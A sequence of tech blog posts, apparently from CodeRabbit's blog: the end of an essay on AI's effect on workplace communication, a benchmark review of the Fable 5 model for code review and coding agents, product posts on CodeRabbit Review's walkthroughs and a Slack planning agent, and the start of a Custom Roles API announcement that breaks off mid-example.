The paper presents these concerns as hypotheses requiring further investigation rather than established conclusions. Its purpose is to encourage debate, not settle it. The underlying question is difficult to ignore. How might communication habits developed through interactions with conversational AI systems influence the way people relate to one another? ## **The parts of work that don’t scale** Both papers point in the same direction. One provides evidence that interactions with AI can influence subsequent human communication. The other argues that society has only begun to explore the long-term consequences of those influences. If AI changes how people relate to one another, what exactly is at stake? The answer begins with the value of human connection itself. Decades of workplace research have found that employees who feel supported, valued, and connected to the people around them are more engaged in their work. Organizations thrive on more than the exchange of information. Trust, cooperation, mentorship, and shared purpose shape how work gets done. Workplaces can automate tasks. Relationships still have to be earned. ## **Humans don't have an API** AI systems are designed to transform prompts into responses. A prompt arrives, the system processes it, and a response follows. The interaction is immediate, task-oriented, and highly predictable. Human collaboration operates differently. Colleagues bring experience, judgment, competing priorities, emotions, relationships, and context to every interaction. A request often becomes a conversation. Discussions lead to new ideas. Detours can reveal better solutions than the one originally imagined. Beyond exchanging information, the strongest teams develop common ground, challenge assumptions and learn from one another. Many of their best ideas emerge from conversations that wander beyond the immediate task at hand. AI excels at producing answers. Organizations excel when people build understanding together. 
## **The human cost of efficiency** Efficiency is one of the great promises of AI. It gives faster responses, decisions, and execution. Organizations naturally embrace tools that help people accomplish more in less time. But speed is only one measure of organizational health. The same systems that reduce friction can also reduce opportunities for discussion, context-sharing, and reflection. Those activities often appear inefficient when measured against a task list, yet they help teams learn, adapt, and make better decisions. Organizations succeed by moving information efficiently. They also succeed by creating alignment, developing people, and building shared understanding. Those outcomes rarely appear on a dashboard, but they shape the quality of decisions, the resilience of teams, and the strength of workplace culture. As AI continues to improve the efficiency of work, organizations will increasingly determine what they value beyond efficiency itself. ## **Rewriting the interface** The next time you draft a Slack message or make a request of a colleague, take a moment to consider the language you're using. Are you having a conversation, or issuing a prompt? Before sending a context-free directive, consider adding back some of the elements that AI interactions remove. Explain why the task matters. Share the broader context. Ask a question instead of issuing a command. Take a moment to acknowledge the person on the other side. None of these actions are efficient in the machine sense, and that is precisely the point. We spent decades worrying about whether artificial intelligence would become too much like humans. But the more immediate risk is humans becoming a little too much like machines.

Fable 5 model review: Early signals from code review and coding tasks

Juan Pablo Flores — Tue, 09 Jun 2026 00:00:00 GMT

**UPDATE:** Access to Fable 5 has been [suspended](https://www.anthropic.com/news/fable-mythos-access) for all users in response to a directive by the U.S. government. Fable 5 is worth testing for autonomous coding work, especially when the prompt is incomplete and the agent has to discover the environment before it can build. For production code review, the current baseline and Opus 4.8 still look safer. Fable 5 is the kind of model that changes how an agent feels when the task is underspecified. It directs exploration well: first learning the environment, then identifying what files, tools, and constraints are available, then building from that grounded picture. It does not spend much time narrating what it is about to do. If it has enough context, it starts building. We saw that across multiple coding projects we used to test the model's capabilities. We could give Fable 5 vague prompts and still get complete projects rather than prototype shells. It also found solution paths that felt less obvious, including approaches that earlier model reviews struggled to reach without more hand-holding. The same behavior also shows up as a cost. In our coding task benchmark, Fable 5 often kept working until the harness cut it off. That makes the model feel capable, but it also makes it expensive and slower in agent workflows that do not have strong stop rules. So the recommendation is not a clean "switch everything." It is: use Fable 5 where autonomy is the product, and keep the current code review path while precision and comment volume are tuned. ### **The decision in one paragraph** Use Fable 5 when the job is to explore, plan, and build, especially when the task can take longer in exchange for a more thorough implementation. Keep the current reviewer in place for now. The code-review signal is close on coverage, but not yet strong enough on precision or volume to become the default. 
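
For readers wondering what a "strong stop rule" might look like in practice, here is a minimal sketch. It is not the harness we used: `RunBudget`, `stop_reason`, and the limits shown are hypothetical, and a real agent loop would need to supply its own step and token counters.

```python
import time
from dataclasses import dataclass


@dataclass
class RunBudget:
    # All limits are illustrative placeholders; tune them per workflow.
    max_seconds: float
    max_steps: int
    max_output_tokens: int


def stop_reason(budget, started_at, steps, output_tokens, now=None):
    """Return why the run should stop, or None if it may continue."""
    # Allow the caller to inject a clock value, which keeps the check testable.
    now = time.monotonic() if now is None else now
    if now - started_at >= budget.max_seconds:
        return "time"
    if steps >= budget.max_steps:
        return "steps"
    if output_tokens >= budget.max_output_tokens:
        return "tokens"
    return None


budget = RunBudget(max_seconds=60.0, max_steps=10, max_output_tokens=1_000)
```

An agent loop would call `stop_reason` before each step and end the run as soon as it returns something other than `None`, so a long exploration is cut off by an explicit rule rather than by the harness timing out.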
## **What’s new in Fable 5** Fable 5 is positioned as a Mythos-class model for autonomous knowledge work and coding, which sets a different bar than a routine model upgrade. The promise is not just better answers or a faster Opus 4.8. It is a model built for longer-running agent work: holding more context, making a plan, and carrying the task further before it needs a human to step in. The launch constraints are still important to the capability story. The model includes blocking classifiers for some cybersecurity and biology requests, and the product supports opt-in fallback to Opus 4.8 after classifier blocks. For developers, the practical takeaway is simple: use Fable 5 when the task needs depth, and keep the existing path for workflows that need predictable speed or precision. The public launch price in the release brief is $10 per million input tokens and $50 per million output tokens, with a 10 percent surcharge on regional endpoints. We have seen prices like this before from reasoning models, especially when they introduce a new model category. Those costs may come down over future iterations, but the early picture is clear: developers should evaluate Fable 5 by cost per solved task, not just by token price. ## **Code review: Close on coverage, weaker on precision** In the 105-EP code review benchmark, Fable 5 stayed close to the current baseline on finding coverage. It passed 65 of 105 actionable EPs, just behind the baseline and Opus 4.8 at 66 of 105\. If every comment type is counted, Fable 5 slightly beat the baseline, with 74 of 105 full EP passes versus 72 of 105\. The weaker part is precision. Fable 5 landed at 32.8 percent actionable precision and 19.4 percent full precision, while Opus 4.8 reached 35.5 percent and 26.5 percent. It also produced 253 comments, more than either comparison run, with a large increase in assertive and nitpick-style output. 
That combination matters for code review because noisy comments create reviewer work even when coverage looks competitive. ![Bar chart shows code review benchmark across three systems and metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_88991bc8c5.png) The category breakdown makes the result feel more uneven than the headline coverage number suggests. Fable 5 has useful breadth, but the gains are not consistent across the kinds of issues developers expect a reviewer to catch. In practice, teams should expect helpful findings, while still needing manual triage and fallback coverage for categories where review trust is harder to earn. The harder examples make the rollout case more cautious. On difficulty 4 EPs, Fable 5 passed 8 of 16, behind the baseline at 10 of 16 and Opus 4.8 at 9 of 16\. That does not make Fable 5 a poor reviewer, but it does mean developers should expect more human judgment on the cases where review trust is hardest to earn. ![Table comparing Current baseline, Fable 5, and Opus 4.8 software performance metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_ed54d5af69.png) ## **Security: Helpful, but not automatic trust** Developers are likely to experience Fable 5 as more security-aware than a generic coding model, especially when the task asks for careful implementation around risky behavior. That does not mean it should be treated as a drop-in security reviewer. The practical posture is to use it for deeper security-sensitive coding work, then keep the review bar high before trusting the findings. The strongest security signal came from active implementation. In our coding task benchmark, Fable 5 completed a security-relevant Bandit task when it had a clear objective and enough time to work through the code. Fable 5 looks more useful when security is part of a concrete coding task than when it is asked to catch every issue in review. 
## **Coding task benchmark: Capable, but long-running** We stopped the coding task benchmark early after a clear pattern emerged: Fable 5 could make meaningful progress, but many tasks ran long enough to hit the agent timeout. That makes this section an experience signal, not a final leaderboard score. The useful story is how the model behaves on real coding work when the task keeps expanding. ![Bar chart details coding task outcomes: 19 timeouts, 6 passed, 4 failed, 4 cancelled.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_123ae7e237.png) The outcome mix should be read as a signal about agent behavior, not as a completed benchmark score. The signal cuts both ways. When Fable 5 finished, it produced serious patches rather than shallow edits. When it struggled, it kept exploring longer than the harness could support. For developers, that makes it a better fit for work where depth is worth the wait, provided the agent has clear limits on time, steps, and tokens. The completed tasks also suggest where Fable 5 is most useful. The wins came from implementation work with real structure: types, APIs, publishing behavior, query logic, caching, and security-relevant code. The misses were useful too. Some were quick wrong turns, while others showed the model investing real effort without converging. That is the tradeoff developers should plan for: more depth, but not always a clean finish. ![Bar charts comparing average agent time and output tokens for passed versus failed coding tasks.](https://victorious-bubble-f69a016683.media.strapiapp.com/image4_539ed94f0a.png) Fable 5 spends real time and output budget when it finishes. When it times out, the harness can still burn substantial context. The token profile tells the same story as the timing data. Fable 5 does not just cost more because of list price. It can also spend longer thinking, exploring, and generating before it reaches an answer. 
Cache discounts may reduce the final bill, and prices may come down over future iterations, but teams should still evaluate the model by cost per solved task. For this kind of agent work, timeout rate, cache behavior, and output token usage matter as much as the published token price. ## **Coding projects show the upside** The coding projects gave the clearest view of Fable 5 at its best. In one project, the model did more than assemble a working surface. It organized the implementation into separate layers for state, decision-making, rendering, and controls, then produced a build that passed. The remaining gaps were the kind you would expect from a first complete version: more robust test coverage, safer state handling, and stricter guards around invalid inputs. Another project showed the same pattern in a more interactive setting. Fable 5 built a working real-time application with a stable loop, procedural visuals, stateful interactions, phase changes, canvas effects, multiple app states, and a successful production build. The issues were not basic completion failures. They were the next layer of engineering work: deterministic tests, small-screen polish, and state edge cases. %[https://youtu.be/HZ_d3MGlHDU] This is the clearest qualitative difference from earlier model reviews. With enough context, Fable 5 moves directly into implementation instead of over-explaining the plan or repeatedly asking for permission. It also seems to spend more effort on architecture, interactions, and product shape than a narrower code-completion model would. ## **Recommendation: Use Fable 5 selectively** The recommendation is selective adoption. Fable 5 is worth testing for autonomous coding work, especially tasks that benefit from deeper planning, multi-file execution, and extra time spent on implementation. I would not make it the default for production code review yet. ### **Where I would use it** * Autonomous coding projects with a clear goal. 
* Multi-file implementation where depth is worth the wait. * Agent workflows with explicit time, step, and token budgets. ### **Where I would hold back** * Default code review traffic before precision tuning. * Security-review positioning without stronger security-specific evidence. * High-throughput workflows where long runs create cost or latency risk. For code review, keep the current baseline or Opus 4.8 path as the default until Fable 5 improves on precision and comment volume. For coding agents, Fable 5 is more compelling, especially when the work benefits from exploration and deeper implementation. The guardrail is operational: give it clear budgets, stop conditions, and review checkpoints. For security workflows, position it as useful for security-sensitive implementation, not as proof of better security review.
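
The "cost per solved task" framing used in this review can be sketched in a few lines. The two prices are the launch prices quoted above; the token counts and outcomes are made-up placeholders, not benchmark measurements, and the sketch ignores cache discounts and the regional surcharge.

```python
INPUT_PRICE_PER_M = 10.0   # USD per million input tokens (launch price quoted above)
OUTPUT_PRICE_PER_M = 50.0  # USD per million output tokens (launch price quoted above)


def run_cost(input_tokens, output_tokens):
    """List-price cost of one agent run in USD."""
    return (input_tokens / 1_000_000 * INPUT_PRICE_PER_M
            + output_tokens / 1_000_000 * OUTPUT_PRICE_PER_M)


def cost_per_solved_task(runs):
    """runs: list of (input_tokens, output_tokens, solved) tuples.

    Spend on failed and timed-out runs still counts toward the total.
    """
    total = sum(run_cost(i, o) for i, o, _ in runs)
    solved = sum(1 for _, _, ok in runs if ok)
    return total / solved if solved else float("inf")


# Hypothetical runs for illustration only.
runs = [
    (400_000, 60_000, True),    # solved
    (900_000, 120_000, False),  # timed out, but still billed
    (200_000, 40_000, True),    # solved
]
cost = cost_per_solved_task(runs)
```

With these placeholder numbers the three runs cost 26 dollars in total and only two are solved, so the cost per solved task is 13 dollars. The timed-out run more than doubles the effective price of each success, which is why timeout rate matters as much as list price.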

How CodeRabbit Review reads a PR the way its author would explain it

Yiwen Xu — Tue, 09 Jun 2026 00:00:00 GMT

## *DIY can get you a faster review. It can't get you an explainable one.* Coding agents are producing more code than teams can keep up with. [The Salesforce Engineering](https://engineering.salesforce.com/scaling-code-reviews-adapting-to-a-surge-in-ai-generated-code/) team reported code volume up roughly 30%, with pull requests regularly exceeding 1,000 lines and review time on the largest PRs beginning to plateau or even decline. Their diagnosis was direct: Reviewers were no longer meaningfully engaging with the changes. That is not a productivity win. A 500-line PR approved in a few minutes usually means the team is shipping code it does not fully understand. As senior engineers burn out and PRs get rubber-stamped, teams lose confidence in what is actually reaching production. That is the problem [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface) was built to fix. In a [previous post](https://www.coderabbit.ai/blog/explainable-reviews-coderabbit-review-context-engine), we covered the context engine and harness that make it possible at a high level. This post goes deeper and examines what the engineering actually looks like, why it is hard to replicate, and why it’s difficult to scale DIY solutions into a verification and quality gate enterprises can trust. ## From flat summaries to logical cohorts Before CodeRabbit Review, CodeRabbit already generated structured summaries and walkthrough comments for every pull request. Reviewers could quickly understand the scope of a PR before diving in. That information was useful, but it still left reviewers with work to do. To review the code effectively, they often had to reconstruct the author’s mental model manually. They had to consider which changes belonged together, which pieces depended on others, and what order made the diff easiest to understand. CodeRabbit Review changes that experience. 
Instead of presenting a pull request as a flat list of files, it reorganizes the diff into a guided, layer-by-layer walkthrough, known as cohorts. It identifies semantic relationships between changes, groups related code blocks into logical cohorts, and orders those cohorts by dependency. Each cohort includes range-specific summaries and diagrams if they make sense, so reviewers can follow the change in an explorable order that matches how the system fits together. That ordering reflects something specific, which is the conceptual sequence behind the change. Adding a new feature that requires a database change might mean starting with the schema, then the business logic that depends on it, then the call sites that invoke that logic, then the front end, then unit tests, and finally integration tests. That is often the order the author had to reason through the change. It is also the order a reviewer needs in order to understand it. *“We did not think of review complexity as a problem of lines added and lines deleted. The real question was: What meaningful change happened? If a block of code is deleted from one place and moved twenty lines down, GitHub may show it as twenty lines removed and twenty lines added: a 40-line diff. But for the reviewer, nothing meaningful changed. CodeRabbit Review is built to make that distinction visible.” \- **Priyanka Kukreja, Staff Product Manager*** GitHub does not understand the logic of the change. In the best case, when a PR author has carefully structured their commits, GitHub can expose that order and give reviewers a path to follow. But most pull requests are not organized that way. Reviewers are often left with a diff ordered by alphabetical order of the file names. That is how reviewers end up reading call sites before the schema they depend on, tests before the business logic they cover, or UI changes before the underlying API exists. 
They have to jump backward and forward through the diff to reconstruct the path they should have been given upfront. CodeRabbit Review removes that reconstruction step. Once the walkthrough is rendered, reviewers can search across block summaries by concept, not just by keyword. Semantic search helps them find the part of a 1,400-line PR they care about in seconds. And because the interface sits as a layer on top of GitHub and GitLab, reviewers can still leave comments on specific code blocks, discuss summaries, and return to the exact lines in the diff at any point, without disrupting their workflow. ### New CodeRabbit Review features Since launch, we’ve continued to [improve CodeRabbit Review](https://www.coderabbit.ai/blog/code-search-peek-in-coderabbit-review) around the things that make code review easier, like staying in context, following the code across files, asking questions in the flow of review, and prioritizing what matters. Code Peek lets reviewers click any symbol in the diff to see its definition and usages inline without opening another tab or losing their place. Chat Agent lets reviewers ask specific questions about the change right where they’re already working. Severity labels help teams filter findings by Critical, Major, Minor, or Trivial, so when a PR needs to ship soon, reviewers can focus on the issues that matter most. Last but not least, we’ve brought this popular feature to [GitLab](https://docs.coderabbit.ai/changelog#coderabbit-review-for-gitlab), giving more engineers access to a more intuitive code review experience. ## Why delivering this is harder than it looks The layer-by-layer walkthrough is the visible surface. The hard part is deciding what those layers should be. CodeRabbit Review does not just summarize changed blocks in isolation. 
It identifies semantically cohesive code blocks, maps the relationships between them, clusters them into cohorts, and lays those cohorts out in the order that makes the change easiest to understand. What used to be a set of leaf nodes becomes a graph: This block introduces the schema, these blocks update the business logic, these call sites depend on that logic, these UI changes expose it, and these tests validate the behavior. That is the “extra sauce” behind the layering. The product is not simply asking a model to explain a diff. It is building a syntactic and semantic graph of the change, then rendering that graph in a way that matches how a reviewer needs to reason through the PR. Getting that graph right matters. That is why CodeRabbit errs on the side of accuracy. Cohorts are grouped only when the relationships are clear, and diagrams appear only when they make those relationships easier to understand. The goal is not to produce the most elaborate explanation possible. It is to produce the explanation an experienced engineer would give when walking another engineer through the change. ### The context engine underneath This is only possible because CodeRabbit Review builds on the same context engine that powers CodeRabbit’s reviews. For every PR, CodeRabbit clones the repository and builds a fresh understanding of how the change connects across files, functions, APIs, and dependencies. It brings in the surrounding engineering context: PR descriptions, linked issues from tools like Jira and Linear, repository knowledge, path-specific instructions, architecture standards, past PRs, and team-specific learnings. Signals from linters, SAST tools, and MCP-connected systems can also be pulled in when they are relevant to the change. But more context is not automatically better context. Too little, and the model fills gaps with assumptions. Too much, and the signal drowns. 
That balance is harder to strike now that MCP makes it easy to connect almost anything: tickets, logs, configs, past PRs, entire repositories. Most tools that tried to solve the context problem landed in one of two places: including anything that looks vaguely related, or including everything and letting the model sort it out. Both approaches degrade review quality. The first produces reviews full of tangents. The second produces expensive, rambling output that sounds thorough but lacks confidence. CodeRabbit’s approach is optimization. Context is deduplicated, compressed, ranked, and filtered before it reaches the model. Subtask-specific context is kept isolated so it does not pollute the main review thread. The final prompt goes through a deliberate selection pass based on what earlier agents found relevant. Then a verification layer checks suggested comments against the code, the team’s guidelines, and the repository configuration before they reach the PR. ### Why the walkthrough feels simple That pipeline is what makes the cohorts and layered walkthrough trustworthy. The cohort summaries are high-quality because they are grounded in accurate and relevant context. The ordering is useful because the underlying graph understands how the changed blocks relate to one another. CodeRabbit Review looks simple because the hard work has already happened underneath. It turns a pull request from a pile of changed lines into a structured map of what changed, why it matters, and how a reviewer should move through it. You cannot build the top layer without the one underneath it. ## Where CodeRabbit leads Making code changes easier to review is a problem many tools are trying to solve. Some, such as [SemanticDiff](https://semanticdiff.com/), can make a raw GitHub diff easier to read by reducing line-level noise. But semantic diff is still a presentation layer. It makes the change easier to look at. 
CodeRabbit Review includes [semantic diff](https://www.coderabbit.ai/blog/introducing-semantic-diff), but goes further. It makes the diff not just easier to read but also easier to understand. It organizes the full PR into a dependency-ordered walkthrough that reflects how the change fits together. That requires more than recognizing that a block moved. It requires understanding which blocks belong together, which ones depend on others, and what order helps a reviewer make sense of the change. Other products are also adding context, but the type of context matters. Linear’s recently launched review experience, [Diff](https://linear.app/now/code-review-should-be-fast), for example, also ties each review back to the issue and project, so reviewers can see the product context behind the work: the associated issue, the broader project, customer feedback, priority, and related tasks. That helps reviewers understand why the work exists. CodeRabbit can draw from Linear and other issue trackers too, but it goes deeper by analyzing the code itself: how changed blocks relate across files, functions, APIs, dependencies, and team standards. That is where CodeRabbit leads. It connects product context, code context, and review context into one explainable walkthrough. That depth shows up in benchmark results. In [Martian’s evaluation](https://codereview.withmartian.com), CodeRabbit leads on F1 score and, more importantly for code review, recall, the measure of how many real issues a system catches. For teams comparing AI review tools or considering a DIY approach, that is the difference that matters. By adding the layering system on top of the context engine, CodeRabbit delivers something competitors cannot match: high-quality, explainable code reviews that save developers time and reduce cognitive load. 
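For readers less familiar with the metrics mentioned above, here is a minimal Python sketch of how precision, recall, and F1 relate for a review tool. The counts are hypothetical and chosen only for illustration; they are not taken from Martian's evaluation or from any CodeRabbit benchmark.

```python
def review_metrics(true_positives: int, false_positives: int, false_negatives: int) -> dict[str, float]:
    """Compute precision, recall, and F1 from raw review-comment counts."""
    flagged = true_positives + false_positives      # everything the tool commented on
    real_issues = true_positives + false_negatives  # everything it should have caught
    precision = true_positives / flagged if flagged else 0.0
    recall = true_positives / real_issues if real_issues else 0.0
    total = precision + recall
    f1 = 2 * precision * recall / total if total else 0.0
    return {"precision": precision, "recall": recall, "f1": f1}


# Hypothetical numbers: 40 real issues exist, the tool posts 50 comments,
# and 30 of those comments point at real issues.
metrics = review_metrics(true_positives=30, false_positives=20, false_negatives=10)
print(metrics)
```

With these made-up counts, precision is 0.60 and recall is 0.75: the tool misses a quarter of the real issues, which is the number recall makes visible.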
## Accelerating past DIY: Why enterprise-grade review requires a purpose-built solution like CodeRabbit With today’s models and tools, many teams can build a basic AI review bot quickly. An internal team can wrap an LLM around a diff, add a webhook, post comments on a PR, and call it a review system. That gets you to v1. It does not get you to consistent, high-quality reviews that scale across teams, repositories, and review standards. The hard part is not generating comments. The hard part is building a system that understands the change well enough to review it accurately, explain it clearly, and improve over time. ### The walkthrough is the top layer, not the product The cohort-by-cohort walkthrough is not a standalone UI feature. It is the top layer of the review system. To replicate it, a team would first need to replicate the quality of the review underneath it: code understanding, context selection, block-level summaries, dependency mapping, and verification. Those are the pieces that make the final walkthrough accurate enough to trust. Without that foundation, a layered walkthrough can become worse than a flat diff. It may look organized, but if the cohorts are wrong or the ordering does not match the logic of the change, reviewers end up spending more effort reconciling the explanation with the code. ### The hidden cost is bigger than the first build DIY also carries costs beyond the initial prototype. Teams have to maintain the system as models change, repositories grow, coding patterns evolve, and more developers start relying on it. They also need visibility into usage, quality, latency, cost, governance, and compliance. Without that visibility, leaders have a hard time knowing whether the investment is actually improving review quality or simply adding another internal tool to maintain. ### Quality requires an evaluation loop The quality problem compounds at every layer. 
High-quality review requires an evaluation loop: systematic testing of every model change, prompt change, and context strategy against recall, precision, latency, and cost. Without that loop, teams cannot tell whether v2 is better than v1. They are shipping changes to their review system blind. Most DIY projects never build this infrastructure. They ship a first version, assume it works, and never develop the feedback mechanism required to make it better. ### Enterprise-scale DIY solution is not a wrapper around an LLM [Salesforce Engineering’s work](https://engineering.salesforce.com/scaling-code-reviews-adapting-to-a-surge-in-ai-generated-code/) on Prizm, their home grown review tool, shows what building this kind of system looks like at enterprise scale. Before Prizm could work, Salesforce had to build the context engineering infrastructure underneath it. Deep semantic analysis on large PRs could take several minutes, which required asynchronous analysis pipelines to make the latency acceptable. The result was not a small wrapper around an LLM. It was a re-architecture of the review system. Salesforce also built feedback loops that monitor production defects and incidents, identify patterns that should have been caught earlier, and feed those learnings back into the system over time. Salesforce is one of the world’s most sophisticated engineering organizations. If that level of investment is required for them to get the baseline right and the first review system working, it is worth being direct about what it means for most engineering teams starting from zero. The question is whether Prizm can scale beyond a first working tool into a consistent, high-quality review gate for the entire engineering organization. That is where many DIY efforts struggle. We have seen customers invest millions into sophisticated internal review tools, only to run into scalability, quality, and maintenance challenges as adoption grows. 
They come to CodeRabbit because they need a battle-tested, enterprise-grade review layer that helps teams ship with confidence. ### CodeRabbit’s advantage is earned review by review CodeRabbit has run that loop across millions of pull requests and more than 15,000 engineering teams over three years. That accumulated signal is the moat: knowing which context matters for which kind of change, which prompt strategies improve recall without adding noise, and which verification patterns catch the edge cases. That advantage cannot be inherited, or recreated by adding a model to a webhook. It has to be earned review by review. ## Conclusion AI is making code cheaper to generate. The bottleneck is no longer output, it is trusted verification. CodeRabbit Review was built for that shift. It turns a pull request from a pile of changed lines into an explainable walkthrough: what changed, why it matters, how the pieces fit together, and where reviewers should focus. Early users are already feeling the difference. One reviewer wrote, “Really digging CodeRabbit Review so far. I love the ability to post the review to GitHub directly from CodeRabbit Review.” Another said, “This is great\! The way it structures things into layers makes it way more digestible to review, and the block summaries make it really nice to step through the code.” DIY can get a team to a first review bot. Semantic diff can make a file easier to read. Product context can explain why the work exists. But explainable review requires something deeper: code understanding, context selection, evaluation, dependency mapping, and a verification layer earned across millions of pull requests. In the agentic SDLC, code generation is becoming commoditized. Trusted verification is becoming the moat. The teams that stay competitive will not be the ones reinventing review infrastructure from scratch, they will be the ones that adopt a verification layer built for agentic development. CodeRabbit is that layer.
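To make the idea of a dependency-ordered walkthrough from this post concrete, here is a minimal Python sketch that orders cohorts so each one appears after the cohorts it depends on. The cohort names and dependency edges are hypothetical, and a plain topological sort is used as a stand-in; the post does not describe how CodeRabbit actually computes its ordering.

```python
from graphlib import TopologicalSorter

# Hypothetical cohorts for one PR. Each key maps to the cohorts it depends on,
# mirroring the schema -> logic -> call sites -> UI -> tests example.
dependencies = {
    "schema": set(),
    "business_logic": {"schema"},
    "call_sites": {"business_logic"},
    "ui": {"call_sites"},
    "tests": {"business_logic", "ui"},
}


def walkthrough_order(deps: dict[str, set[str]]) -> list[str]:
    """Return cohorts in an order where every dependency comes first."""
    return list(TopologicalSorter(deps).static_order())


order = walkthrough_order(dependencies)
print(" -> ".join(order))
```

A reviewer following this order never reads a call site before the logic it calls, which is the property a layered walkthrough needs. If the edges are wrong, the order is wrong too, which is why the quality of the underlying graph matters more than the sort itself.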

Plan with CodeRabbit Agent: Where great engineering work begins

Priyanka Kukreja — Mon, 08 Jun 2026 00:00:00 GMT

Every feature used to take the same trip: Slack thread, Zoom calls, design doc, a sister team flagging dependencies halfway through, and then an engineer manually stuffing all that context into a coding agent somewhere else entirely. ![CodeRabbit app planning request for updating docs on Agent for Slack's /plan feature.](https://victorious-bubble-f69a016683.media.strapiapp.com/Prompt_67c55b4e34.png) [Plan in CodeRabbit Agent for Slack](https://www.coderabbit.ai/plan) short-circuits that workflow. Idea, plan, and implementation all stay in the same Slack thread where the conversation started. Whether you type /plan in any Slack thread, click "Plan this work" when [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent) suggests it, or trigger it from a message action, an ambiguous engineering request becomes a structured, codebase-aware implementation plan without ever leaving the conversation where the idea was raised. ## What Plan does %[https://youtu.be/PIFlexrrUKY] Plan is a workflow that sits between intent and code. It makes the process of going from "we want to do this" to "here are the code changes" lightning fast. It looks at three things together: 1. The request itself 2. The Slack thread context around it 3. The connected repository context that Agent already understands Then it produces a plan grounded in your actual codebase. The workflow is deliberately structured to run in two steps: **Step 1: The scoped brief.** A fast, lightweight pass that names the likely repos and modules, the major workstreams, the risks and unknowns, the validation surface, and a concise recommendation for how to proceed. It's something you can react to in seconds. The goal here is to steer the agent by either redirecting or accepting. 
![A technical document detailing tasks for a Black Agent system integration and update.](https://victorious-bubble-f69a016683.media.strapiapp.com/Plan_971328f25b.png) **Step 2: The detailed plan.** Once a scoped brief is created, the Agent gives you the option to create a detailed plan. Here the Agent expands the brief into a full implementation plan: repository scope, assumptions, phased work, specific tasks per phase, cross-repo coordination, non-goals, and a summary of the approach. The plan posts back into the Slack thread, and where necessary, is also saved as a Slack Canvas. This canvas is a durable artifact you and your team can refine, collaborate on, share, and reference in conversations. When the plan is ready to execute, Agent gives you an "Implement this plan" option, which hands the plan off to Agent to actually build. %[https://youtu.be/AlGYJ-Mqe-Q] ## Why This Matters Having CodeRabbit Agent for Slack create a Plan for you before the actual code changes prevents rework. Multi-file features, schema migrations, API contract changes, and refactors where order of operations matters are often the changes where things can go sideways. This often happens because nobody mapped the “work surface” before someone started writing code for it. Planning is the cheap, fast, shared-thinking step that catches those problems while they're still words in a thread instead of merge conflicts in a PR. A few concrete wins: * **From plan to PR in one click.** When the plan looks right, hit "Implement this plan" and CodeRabbit goes from approved plan to an open pull request without ever leaving the Slack thread. * **Scope clarity, faster.** The scoped brief gives you a codebase-aware first read within minutes. This is much faster than a 30-minute meeting followed by a design doc to align the team. * **Shared context, not tribal knowledge.** The Plan lives in the Slack thread where the conversation is happening. 
Your PM, your tech lead, and the engineer picking up the work all see the same canvas artifact. * **Codebase-grounded, not generic.** Because CodeRabbit already understands your repositories, the plan references real services and modules. This is not the hypothetical advice you'd get from a chat assistant working blind. * **Built for team collaboration in Slack Canvas.** The plan canvas is a living document your team can shape together, right where the conversation is happening. Huddle on it, leave feedback for each other, edit in place, and assign owner, editor, or commenter roles. Version history shows who changed what and when. Threaded replies keep discussion attached to the line it's about. ## How It's different A generic LLM chat tool with access to your codebase can produce something that looks like a plan, but at best it's guessing. At worst, it's misleading you away from ground reality in the code. It doesn't know that your billing service is the source of truth for how customer subscription plans work, not the identity service. It also doesn't have real-world context like the mobile clients being out of scope this quarter. A generic plan reads well but falls apart when it meets the actual feature build-out. CodeRabbit's planning is grounded in the repositories you've already connected, plus the Slack conversation you've had with the team. It knows the modules, the dependency graph, and the patterns your team actually uses, along with the [conversational context in Slack](https://www.coderabbit.ai/blog/coderabbit-agent-for-slack-workflows). Two differences worth calling out: 1. Planning happens where the work is discussed. Most planning tools require a context switch: open a doc, open a ticket, open a separate AI tab, paste the prompt, copy the output back. Planning in the CodeRabbit Agent for Slack runs in the thread, and the conversation that produced the idea is the conversation that produces the plan. 2. 
CodeRabbit doesn't silently turn every thread into a planning session. The "Planning could help here" suggestion only appears when the task looks large or ambiguous enough that planning would actually reduce risk. For small bug fixes, one-file changes, and routine questions, it stays out of the way and lets you jump straight to implementation. ## How planning fits the Agentic SDLC This release is part of a larger arc: we are building toward a software development lifecycle where AI agents are genuine collaborators across every phase, not just at code review. The CodeRabbit Agent for Slack already does code review, answers questions about your codebase, and can implement changes. Planning is the missing front of the lifecycle: the strategy step that makes everything downstream more reliable. When a plan is good, implementation is faster, review is sharper, and rollout is safer. When planning is absent, every later stage has to absorb the ambiguity. Here's how the pieces connect: 1. **Plan**: Turn an ambiguous request into a structured, codebase-aware approach (this release). 2. **Implement**: Hand the plan to CodeRabbit Agent for Slack to build, with the same context already loaded. 3. **Review**: CodeRabbit reviews the resulting changes against the plan and the codebase. 4. **Iterate**: The Slack thread stays as the durable record of why decisions were made. We believe that the [best agentic SDLC](https://www.coderabbit.ai/blog/agentic-sdlc-workflow) isn't a tool that replaces engineers; it’s a platform that empowers builders by compressing the time between intent and code while keeping humans in control at every decision point. ## Get started If your team uses the CodeRabbit Agent for Slack, planning is available now. In any thread, try: ``` /plan \ ``` The better your prompt, the better the plan. Include product behavior, expected scope, constraints, and what's out of scope. But even a one-line request gets you a scoped brief you can refine in the thread.

Automate role management in CodeRabbit with the new Custom Roles API

Henry Lau — Fri, 05 Jun 2026 00:00:00 GMT

Until now, every custom role in CodeRabbit lived in the dashboard. An admin opened the Permissions page, built a role, set its read and write permissions, and assigned it to each user by hand. That's fine when you're onboarding a few people. It doesn't scale when you're a large organization with engineers joining, switching teams, and leaving every week. Today we're introducing the [Custom Roles API for Enterprise](https://docs.coderabbit.ai/api-reference/roles-create), a set of REST endpoints that let you create, configure, and assign custom roles programmatically. Everything you can do on the Permissions page can now be automated, so access scales with your headcount and you can get the most out of every CodeRabbit subscription. ## What you can automate with the Custom Roles API **Standardize every new user.** Set a role as the default with `is_default`, and every new member starts with the right baseline access automatically. **Manage roles as code.** Define your org's roles in version control and create them through the API. Use `duplicate_from` to base a new role like *Security Reviewer* on an existing one (`cr_member` by default), then adjust only the permissions that differ. **Sync roles with your identity system.** Connect the API to an HRIS like Rippling so the right role is granted the moment someone joins and revoked the moment they leave. 
![Web application displaying 'Roles and Permissions' page with a table of user roles.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_87ea9bfd18.png)

Creating a new custom role takes a single call:

```
POST https://api.coderabbit.ai/v1/roles
x-coderabbitai-api-key:

{
  "name": "Security Reviewer",
